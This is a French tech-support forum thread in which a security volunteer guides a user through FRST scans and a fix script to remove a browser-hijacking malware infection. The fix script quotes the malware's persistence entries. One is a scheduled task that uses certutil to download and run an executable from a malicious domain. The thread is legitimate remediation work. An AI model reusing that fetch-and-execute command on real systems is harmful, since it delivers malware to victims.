Infection pc

Signaler
-
 jpanasonic -
Bonjour a tous, j'ai chopper un virus sur internet, mon pc m'ouvre des pages web sans arrêt.

Dans gestionnaire de tache j'ai divers programme comme alternance, trustdlogo.... qui font bugger le pc, si je les désactives ça fonctionne bien, jusqu'au prochain démarrage.

j'ai un rapport de ZHPDIAG en ma possession, si une personne veut bien jeter un œil, et m'aider.

6 réponses

Messages postés
16304
Date d'inscription
dimanche 16 décembre 2007
Statut
Membre
Dernière intervention
30 septembre 2020
2 165
bonjour
scanne avec
https://fr.malwarebytes.com/

Slt, j'ai tester hier, mais ça ne change rien
Messages postés
180106
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
30 septembre 2020
22 164
Bonjour/Bonsoir,

Voici la procédure à suivre.
Sur les liens en bleus, tu trouveras des tutoriels explicatifs avec tous les détails pour suivre les étapes.

1)
Répare les navigateurs WEB concernés par les problèmes :
(ne pas utiliser zoek et faire une réinitialisation manuelle)


2) Pour vérifier ton ordinateur, pour d'éventuels infections et avoir un état général du système :

Suis le tutoriel FRST en cliquant sur ce lien bleu. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST,
ATTENDRE LA FIN DU SCAN, il dure plusieurs minutes.
Un message indique que l'analyse est terminée.

Trois rapports FRST seront générés :
  • FRST.txt
  • Shortcut.
  • Additionnal.txt


Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

(Les liens bleus mènent à des tutoriels explicatifs pas à pas, clic dessus pour avoir les instructions plus précises à suivre).

Merci pour ton aide voici les 3 rapports

https://pjjoint.malekal.com/files.php?id=FRST_20200907_10p10u8f1412

https://pjjoint.malekal.com/files.php?id=20200907_p6l5t5i5m9

https://pjjoint.malekal.com/files.php?id=20200907_v14e13h13z12p8
Messages postés
180106
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
30 septembre 2020
22 164
Voici la correction FRST à réaliser.
Tu peux t'aider de cette note explicative avec des captures d'écran.

1- Ouvre FRST -
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start:
CloseProcesses:
CreateRestorePoint:
HKLM\...\RunOnce: [ru4tilm55mt] => C:\Program Files (x86)\azdos\425210528.exe [574976 2020-09-06] () [Fichier non signé]
HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1
HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKLM\...\Policies\Explorer: [NoResolveSearch] 1
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-19\...\RunOnce: [] => [X]
HKU\S-1-5-19\...\RunOnce: [Explorer_Privacy_WebsiteIDAccess_Disable] => REG ADD "HKCU\Control Panel\International\User Profile" /F /V "HttpAcceptLanguageOptOut" /T REG_DWORD /D "00000001" <==== ATTENTION
HKU\S-1-5-19\...\Policies\Explorer: [NoInstrumentation] 1
HKU\S-1-5-20\...\RunOnce: [] => [X]
HKU\S-1-5-20\...\RunOnce: [Explorer_Privacy_WebsiteIDAccess_Disable] => REG ADD "HKCU\Control Panel\International\User Profile" /F /V "HttpAcceptLanguageOptOut" /T REG_DWORD /D "00000001" <==== ATTENTION
HKU\S-1-5-20\...\Policies\Explorer: [NoInstrumentation] 1
2020-09-06 21:05 - 2020-09-06 21:05 - 000000000 ____D C:\Users\jpanasonic\AppData\Roaming\thenotafade
2020-09-06 21:05 - 2020-09-06 21:05 - 000000000 ____D C:\Users\jpanasonic\AppData\Roaming\Oplert
2020-09-06 21:05 - 2020-09-06 21:05 - 000000000 ____D C:\Users\jpanasonic\AppData\Local\Western
2020-09-06 21:05 - 2020-09-06 21:05 - 000000000 ____D C:\ProgramData\3CJPMILN7HHYP7RCYSS947OHA
2020-09-06 21:05 - 2020-09-06 21:05 - 000000000 ____D C:\Program Files (x86)\Dafer
2020-09-06 21:04 - 2020-09-06 22:03 - 000000000 ___HD C:\Windows\rss
2020-09-06 21:04 - 2020-09-06 21:52 - 000003254 _____ C:\Windows\system32\Tasks\csrss
2020-09-06 21:04 - 2020-09-06 21:09 - 000000000 ____D C:\Program Files (x86)\MaskVPN
2020-09-06 21:04 - 2020-09-06 21:04 - 008620544 _____ C:\Users\jpanasonic\AppData\Local\agent.dat
2020-09-06 21:04 - 2020-09-06 21:04 - 002174281 _____ C:\Users\jpanasonic\AppData\Local\Driptip.tst
2020-09-06 21:04 - 2020-09-06 21:04 - 001895383 _____ C:\Users\jpanasonic\AppData\Local\Freestring.bin
2020-09-06 21:04 - 2020-09-06 21:04 - 001564823 _____ C:\ProgramData\6780
2020-09-06 21:04 - 2020-09-06 21:04 - 001200640 _____ (sacsadcsacsadsadfsa) C:\ProgramData\141380.exe
2020-09-06 21:04 - 2020-09-06 21:04 - 001134592 _____ C:\Users\jpanasonic\AppData\Local\Redfix.exe
2020-09-06 21:04 - 2020-09-06 21:04 - 001134592 _____ C:\Users\jpanasonic\AppData\Local\Driptip.exe
2020-09-06 21:04 - 2020-09-06 21:04 - 000141312 _____ C:\Users\jpanasonic\AppData\Local\installer.dat
2020-09-06 21:04 - 2020-09-06 21:04 - 000126464 _____ C:\Users\jpanasonic\AppData\Local\noah.dat
2020-09-06 21:04 - 2020-09-06 21:04 - 000126464 _____ C:\Users\jpanasonic\AppData\Local\lobby.dat
2020-09-06 21:04 - 2020-09-06 21:04 - 000074752 _____ (WinHost) C:\ProgramData\355235.exe
2020-09-06 21:04 - 2020-09-06 21:04 - 000071712 _____ C:\Users\jpanasonic\AppData\Local\Config.xml
2020-09-06 21:04 - 2020-09-06 21:04 - 000068019 _____ C:\Users\jpanasonic\AppData\Local\Redfix.tst
2020-09-06 21:04 - 2020-09-06 21:04 - 000005568 _____ C:\Users\jpanasonic\AppData\Local\md.xml
2020-09-06 21:04 - 2020-09-06 21:04 - 000000025 _____ C:\ProgramData\355235.bat
2020-09-06 21:04 - 2020-09-06 21:04 - 000000025 _____ C:\ProgramData\141380.bat
2020-09-06 21:04 - 2020-09-06 21:04 - 000000000 ___HD C:\ProgramData\Windows Host
2020-09-06 21:04 - 2020-09-06 21:04 - 000000000 ____D C:\ProgramData\67
2020-09-06 21:04 - 2020-09-06 21:04 - 000000000 ____D C:\Program Files (x86)\notrmw
2020-09-06 21:04 - 2020-09-06 21:04 - 000000025 _____ () C:\ProgramData\141380.bat
2020-09-06 21:04 - 2020-09-06 21:04 - 001200640 _____ (sacsadcsacsadsadfsa) C:\ProgramData\141380.exe
2020-09-06 21:04 - 2020-09-06 21:04 - 000000025 _____ () C:\ProgramData\355235.bat
2020-09-06 21:04 - 2020-09-06 21:04 - 000074752 _____ (WinHost) C:\ProgramData\355235.exe
2020-09-06 21:05 - 2020-09-06 21:05 - 000334288 _____ (Mozilla Foundation) C:\ProgramData\freebl3.dll
2020-09-06 21:05 - 2020-09-06 21:05 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2020-09-06 21:05 - 2020-09-06 21:05 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
2020-09-06 21:05 - 2020-09-06 21:05 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2020-09-06 21:05 - 2020-09-06 21:05 - 000144848 _____ (Mozilla Foundation) C:\ProgramData\softokn3.dll
2020-09-06 21:05 - 2020-09-06 21:05 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
2020-06-01 12:05 - 2020-06-01 12:05 - 000000624 _____ () C:\Users\jpanasonic\AppData\Roaming\All CPU MeterV3_Settings.ini
2020-06-02 08:51 - 2020-06-02 08:51 - 000003968 _____ () C:\Users\jpanasonic\AppData\Roaming\System Monitor II_CPU0_Settings.ini
2020-06-02 08:52 - 2020-06-04 22:01 - 000000116 _____ () C:\Users\jpanasonic\AppData\Roaming\System Monitor II_UptimeRecord.ini
2020-09-06 21:04 - 2020-09-06 21:04 - 008620544 _____ () C:\Users\jpanasonic\AppData\Local\agent.dat
2020-09-06 21:04 - 2020-09-06 21:04 - 000071712 _____ () C:\Users\jpanasonic\AppData\Local\Config.xml
2020-09-06 21:04 - 2020-09-06 21:04 - 001134592 _____ () C:\Users\jpanasonic\AppData\Local\Driptip.exe
2020-09-06 21:04 - 2020-09-06 21:04 - 002174281 _____ () C:\Users\jpanasonic\AppData\Local\Driptip.tst
2020-09-06 21:04 - 2020-09-06 21:04 - 001895383 _____ () C:\Users\jpanasonic\AppData\Local\Freestring.bin
2020-09-06 21:04 - 2020-09-06 21:04 - 000141312 _____ () C:\Users\jpanasonic\AppData\Local\installer.dat
2020-09-06 21:04 - 2020-09-06 21:04 - 000126464 _____ () C:\Users\jpanasonic\AppData\Local\lobby.dat
2020-09-06 21:04 - 2020-09-06 21:04 - 000005568 _____ () C:\Users\jpanasonic\AppData\Local\md.xml
2020-09-06 21:04 - 2020-09-06 21:04 - 000126464 _____ () C:\Users\jpanasonic\AppData\Local\noah.dat
2020-06-05 20:46 - 2020-06-09 10:30 - 000000128 _____ () C:\Users\jpanasonic\AppData\Local\PUTTY.RND
2020-09-06 21:04 - 2020-09-06 21:04 - 001134592 _____ () C:\Users\jpanasonic\AppData\Local\Redfix.exe
2020-09-06 21:04 - 2020-09-06 21:04 - 000068019 _____ () C:\Users\jpanasonic\AppData\Local\Redfix.tst
Task: {5463A38F-78E8-4D2F-85D1-9C09EA170591} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe <==== ATTENTION
Task: {753A8731-A364-4F29-AD94-DAF62741A3AE} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://bbistrovantonbb.com/app/app.exe C:\Users\jpanasonic\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\jpanasonic\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
2020-09-07 18:23 - 2020-09-07 18:23 - 003325312 _____ (Nicolas Coolman) C:\Users\jpanasonic\Downloads\ZHPCleaner (1).exe
2020-09-07 18:12 - 2020-09-07 18:13 - 000000000 ____D C:\Program Files\X6TPLZZLZZ
2020-09-07 18:12 - 2020-09-07 18:12 - 000000000 ____D C:\Users\jpanasonic\AppData\Roaming\yxalbx4rug1
2020-09-07 17:47 - 2020-09-07 18:22 - 000312203 _____ C:\Users\jpanasonic\Desktop\ZHPDiag.txt
2020-09-07 17:44 - 2020-09-07 17:44 - 000000918 _____ C:\Users\jpanasonic\Desktop\ZHPDiag.lnk
2020-09-07 17:42 - 2020-09-07 17:42 - 000000000 ____D C:\Users\jpanasonic\AppData\Roaming\nsgecfiyf1a
2020-09-07 17:42 - 2020-09-07 17:42 - 000000000 ____D C:\Program Files\192GCI6M8V
2020-09-07 06:16 - 2020-09-07 19:30 - 000000000 ____D C:\Windows\trustedlogos
2020-09-07 06:16 - 2020-09-07 06:16 - 000000000 ____D C:\Users\jpanasonic\AppData\Roaming\t3541lrv5zc
2020-09-07 06:16 - 2020-09-07 06:16 - 000000000 ____D C:\Program Files\REWV7OKVZS
2020-09-07 00:42 - 2020-09-07 00:42 - 003304832 _____ (Nicolas Coolman) C:\Users\jpanasonic\Downloads\ZHPDiag3.exe
2020-09-06 21:59 - 2020-09-06 22:00 - 056135808 _____ (Mozilla) C:\Users\jpanasonic\Downloads\Firefox Setup 80.0.exe
2020-09-06 21:56 - 2020-09-07 18:25 - 000000928 _____ C:\Users\jpanasonic\Desktop\ZHPCleaner.lnk
2020-09-06 21:56 - 2020-09-07 18:25 - 000000000 ____D C:\Users\jpanasonic\AppData\Roaming\ZHP
2020-09-06 21:56 - 2020-09-07 17:44 - 000000000 ____D C:\Users\jpanasonic\AppData\Local\ZHP
2020-09-06 21:56 - 2020-09-06 21:56 - 003325312 _____ (Nicolas Coolman) C:\Users\jpanasonic\Downloads\ZHPCleaner.exe
2020-09-06 21:47 - 2020-09-06 21:49 - 000000000 ____D C:\AdwCleaner
2020-09-06 21:47 - 2020-09-06 21:47 - 008414384 _____ (Malwarebytes) C:\Users\jpanasonic\Downloads\adwcleaner_8.0.7.exe
2020-09-06 21:38 - 2020-09-06 21:38 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2020-09-06 21:34 - 2020-09-06 21:34 - 000057344 _____ C:\Users\jpanasonic\AppData\Roaming\Microsoft\Windows\Start Menu\OdingEU1.exe
2020-09-06 21:05 - 2020-09-07 17:42 - 000000000 ____D C:\ProgramData\DC8F74BB
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [MistySky] => "C:\Windows\rss\csrss.exe" <==== ATTENTION
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [NLHSESSTH5HCROE] => "C:\Program Files\438Y0YJYC4\438Y0YJYC.exe"
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [Windows Host] => C:\ProgramData\Windows Host\Windows Host.exe [74752 2020-09-06] (WinHost) [Fichier non signé]
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [notrmw] => C:\Program Files (x86)\notrmw\notrmw.dll [29184 2020-09-06] () [Fichier non signé]
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [2769611] => "C:\Users\jpanasonic\AppData\Roaming\kbyhzewzcbf\aatv2ydx4ii.exe" /VERYSILENT
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [5FLBVSNLMP2HS97] => "C:\Program Files\GGMTED56ZR\GGMTED56Z.exe"
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [1174182] => "C:\Users\jpanasonic\AppData\Roaming\ndib52ceqvj\t1ohwyrzs5f.exe" /VERYSILENT
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [W6SS4Z2E1IZB4GB] => "C:\Program Files\Z07S4EX3U7\Z07S4EX3U.exe"
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [2973894] => "C:\Users\jpanasonic\AppData\Roaming\pmm44k3x04q\rj2tycc0na3.exe" /VERYSILENT
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [A1WWYG68ME5J037] => "C:\Program Files\MLLCIL83TA\MLLCIL83T.exe"
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [IALG98GZAGQSIYS] => "C:\Program Files\D7N8TQ6KPO\D7N8TQ6KP.exe"
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [5570056] => "C:\Users\jpanasonic\AppData\Roaming\juo4qyj3wbe\2tncbss152s.exe" /VERYSILENT
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [4700439] => "C:\Users\jpanasonic\AppData\Roaming\hhzowwyhqgv\x3bqqbevhz4.exe" /VERYSILENT
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [2ZDHCLTJ2JBH96V] => "C:\Program Files\BXVTBRDEJN\BXVTBRDEJ.exe"
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [FBXWVPTI1700ZVG] => "C:\Program Files\FLUA6DJZK0\FLUA6DJZK.exe"
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [3397722] => "C:\Users\jpanasonic\AppData\Roaming\1voos3ux2vp\xnngl0hw03w.exe" /VERYSILENT
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [WHTINSC2TGQ0QT9] => "C:\Program Files\RAP2EGW8ZU\RAP2EGW8Z.exe"
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [7371535] => "C:\Users\jpanasonic\AppData\Roaming\y3v3dod40aw\0g4zdxpx3in.exe" /VERYSILENT
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [4289917] => "C:\Users\jpanasonic\AppData\Roaming\gn3wxnjxe01\dhwqvsdmhz3.exe" /VERYSILENT
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [C5Z26ODZJXXWCGW] => "C:\Program Files\S2J3GZFQTE\S2J3GZFQT.exe"
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [1886098] => C:\Users\jpanasonic\AppData\Roaming\t3541lrv5zc\hj1h2jmpqvz.exe [988626 2020-09-07] () [Fichier non signé]
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [CC8V3LQML5546BT] => C:\Program Files\REWV7OKVZS\ZIKH6RGET.exe [1774592 2020-09-07] () [Fichier non signé]
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [474882] => C:\Users\jpanasonic\AppData\Roaming\nsgecfiyf1a\0fgttrx4ldi.exe [927731 2020-09-07] () [Fichier non signé] [Fichier en cours d'utilisation]
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [4TJ129BTIRD7SWO] => C:\Program Files\192GCI6M8V\192GCI6M8.exe [1666048 2020-09-07] () [Fichier non signé]
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [2198011] => C:\Users\jpanasonic\AppData\Roaming\yxalbx4rug1\amkzav5k0sm.exe [927731 2020-09-07] () [Fichier non signé] [Fichier en cours d'utilisation]
HKU\S-1-5-21-2591265265-2232003374-1423799350-1001\...\Run: [K3KPC0I1A629TJM] => C:\Program Files\X6TPLZZLZZ\X6TPLZZLZ.exe [1666048 2020-09-07] () [Fichier non signé]
EmptyTemp:
RemoveProxy:
Reboot:
End::

3- Une fois le script copié clique sur Corriger.

Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT.



2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :


3°)
Termine par un nettoyage Malwarebytes Anti-Malware

4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.


Slt, voici le résultat

https://pjjoint.malekal.com/files.php?id=20200908_w11w11i15u15h13

Au redémarrage pas de bug en vue, ni de pages internet qui s'ouvre, je vais tester jusqu’à ce soir et en fonction je clôture.

Merci pour ton aide
Slt, tout a l'heure bon, voici un rescan au cas ou si tu voie quelque chose

https://pjjoint.malekal.com/files.php?id=FRST_20200909_p15r12n11s8k14

https://pjjoint.malekal.com/files.php?id=20200909_y15z8k8k7m13

https://pjjoint.malekal.com/files.php?id=20200909_e15o11s8i8f12
Messages postés
180106
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
30 septembre 2020
22 164
Scanne de fichier C:\Windows\AAct_Tools\AAct.exe
Sur https://www.virustotal.com et donne le lien ici.
Voici

https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/detection